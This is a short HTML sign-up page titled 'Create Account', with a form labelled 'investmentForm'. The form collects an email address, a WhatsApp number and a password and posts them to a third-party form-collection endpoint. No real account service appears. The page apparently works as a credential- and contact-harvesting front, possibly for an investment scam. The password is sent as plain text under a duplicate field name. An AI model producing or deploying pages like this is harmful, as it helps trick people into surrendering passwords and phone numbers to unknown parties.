<!DOCTYPE html>
<html lang="so">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Create Account</title>
    <style>
        body {
            background: linear-gradient(to right, #00c9a7, #92fe9d);
            font-family: 'Poppins', sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            color: #333;
        }

        .form-container {
            background: white;
            padding: 40px;
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(0,0,0,0.2);
            width: 90%;
            max-width: 400px;
            text-align: center;
        }

        h2 {
            margin-bottom: 20px;
        }

        input {
            width: 90%;
            padding: 12px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 10px;
        }

        button {
            background-color: #00c9a7;
            border: none;
            padding: 15px 30px;
            font-size: 1em;
            color: white;
            border-radius: 30px;
            cursor: pointer;
            margin-top: 20px;
            transition: 0.3s;
        }

        button:hover {
            background-color: #009e7d;
        }
    </style>
</head>
<body>

    <div class="form-container">
        <h2>Create Account</h2>
        <form id="investmentForm" action="https://getform.io/f/bgdpmvma" method="POST">
            <input type="email" name="email" placeholder="Enter Your Email" required>
          
           <input type="text" name="number" placeholder="Enter Your WhatsApp" required>
           
             <input type="text" name="number" placeholder="Create New Password" required><br>
            <button type="submit">Create</button>
        </form>
    </div>

</body>
</html>
